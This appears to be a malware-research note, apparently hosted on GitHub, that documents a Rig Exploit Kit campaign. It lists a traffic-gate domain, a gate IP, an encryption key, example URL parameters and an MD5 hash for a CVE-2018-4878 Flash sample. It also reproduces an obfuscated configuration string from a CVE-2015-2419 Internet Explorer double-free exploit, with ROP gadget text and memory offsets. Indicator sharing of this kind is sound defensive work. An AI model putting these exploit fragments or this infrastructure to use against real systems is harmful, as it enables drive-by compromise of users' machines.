Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
Ref: https://twitter.com/JAMESWT_MHT/status/1142065672387792896
Traffic Gate: makemoneyeasywith[.]me
Rig Exploit Kit Gate: 83.220.174[.]80
Enc_key: "ctELwuzs5N95a"
CVE-2015-2419 Internet Explorer Double-Free (Copy/Paste from AnglerEK):
"{\"ll\":\"length\",\"l\":\"charCodeAt\",\"I\":\"fromCharCode\",\"Il\":\"floor\",\"IlI\":\"random\",\"lI\":\"stringify\",\"lII\":\"location\",\"II\":\"host\",\"llI\":\"number\",\"lll\":\"ScriptEngineBuildVersion\",\"lIl\":\"ScriptEngineMajorVersion\",\"IIl\":\"ScriptEngineMinorVersion\",\"Ill\":\"setInterval\",\"III\":\"clearInterval\",\"lIlI\":\"ur0pqm8kx\",\"IlII\":\"http://\",\"lllI\":\"localhost/\",\"lIIl\":\"u\",\"IlIl\":\"x\",\"llll\":\"xexec\",\"Illl\":\"EAX\",\"lIII\":\"ECX\",\"IIIl\":\"EDI\",\"IllI\":\"ESP\",\"IIlI\":\"XCHG EAX,ESP\",\"IIll\":\"MOV [ECX+0C],EAX\",\"llIl\":\"CAll [EAX+4C]\",\"llII\":\"MOV EDI,[EAX+90]\",\"IIII\":\"a\",\"lIll\":\"kernel32.dll\",\"lIlll\":\"virtualprotect\",\"IIIlI\":11,\"lIIll\":0,\"lllll\":17905,\"lIllI\":500,\"llIIl\":16,\"IlIII\":0,\"IIIll\":1,\"IIlII\":2,\"lIlII\":3,\"IllIl\":4,\"lllIl\":5,\"IIlll\":8,\"lIlIl\":9,\"lIIIl\":10,\"IllII\":11,\"lIIlI\":12,\"IlIll\":16,\"IIIIl\":24,\"IlIlI\":100,\"IIIII\":1,\"llIlI\":2,\"lllII\":2147483647,\"llIll\":4294967295,\"IIllI\":255,\"llIII\":256,\"lIIII\":65535,\"IIlIl\":16776960,\"IlIIl\":16777215,\"llllI\":4294967040,\"IlllIl\":4294901760,\"Illll\":4278190080,\"IlllI\":65280,\"llllIl\":16711680,\"lllIlI\":19,\"llIIII\":4096,\"IIIIIl\":4294963200,\"IIlllI\":4095,\"llIIlI\":14598366,\"IIllIl\":48,\"llIIll\":32,\"IIIllI\":15352,\"llIlll\":85,\"lIIIII\":4096,\"IllllI\":400,\"lIIlII\":311296000,\"IIIlIl\":61440,\"llllII\":24,\"IIIIll\":32,\"IlIlIl\":17239,\"lllllI\":15,\"IllIll\":256,\"llIllI\":76,\"lllIll\":144,\"lIlIIl\":17416,\"IlIIll\":65536,\"IIlIll\":100000,\"lIlllI\":28,\"IIlIlI\":60,\"lIlIII\":44,\"IIIlll\":28,\"IllIII\":128,\"lllIIl\":20,\"lIIIll\":12,\"lIlIlI\":16,\"IIlIIl\":4,\"IlIIIl\":2,\"lIllll\":110,\"IIIlII\":64,\"IllIlI\":-1,\"lIIIIl\":0,\"IllIlII\":1,\"lIIlll\":2,\"IlIlll\":3,\"IIlIII\":4,\"lIllIl\":5,\"IIllll\":7,\"IIIIII\":9,\"lIlIll\":10,\"IlllII\":11,\"lIllII\":12,\"Illlll\":-2146823286,\"lIIIlI\":[148,195],\"lIIlIl\":[137,65,12,195],\"IIllII\":[122908,122236,125484,2461125,208055,1572649,249826,271042,98055,62564,162095,163090,340146,172265,163058,170761,258290,166489,245298,172955,82542],\"IlIIII\":[150104,149432,152680,3202586,214836,3204663,361185,285227,103426,599295,365261,226292,410596,180980,226276,179716,320389,175621,307381,792144,183476],\"IIIIlI\":48,\"IIIlIlI\":57,\"lllIII\":65,\"IllIIl\":90,\"IlIlII\":97,\"llllll\":122,\"IlIllI\":16640,\"llIlIl\":23040,\"IlIIlI\":4259840,\"lIIIIlI\":5898240,\"llIIIl\":1090519040,\"llIIIII\":1509949440,\"IlIIIlI\":32,\"IIIlllI\":8192,\"lllllII\":2097152,\"IIIllll\":536870912,\"llIlII\":{\"17416\":4080636,\"17496\":4080636,\"17631\":4084748,\"17640\":4084748,\"17689\":4080652,\"17728\":4088844,\"17801\":4088844,\"17840\":4088840,\"17905\":4088840}}"
Example of RigEK URL param:
'Keaousw': heartfelt
'MpvMDQeZv': blackmail
'YgreuaP': constitution
'rikRCBhfo': golfer
'SXMduryvVT': heartfelt
'QLhwDhCa': golfer
'BFdWGSafxAoOWEL': vest
'jDRSPIDWeheH': referred
'FzjrwpWqhF': heartfelt
't4tsdfsg4': __
'qRbdgxQKoVJJk': known
'ztqpDNCEvOfMmW': heartfelt
'GGpkyia': referred
'JyQvKMWfFTRIo': referred
'yXqTyhZrQhmGN': difference
'PEvBRgSIhVPFMz': difference
CVE-2018-4878 Adobe Flash Player UAF:
MD5: 4fbe475a6d26f20e2a3f4c8becc0b14f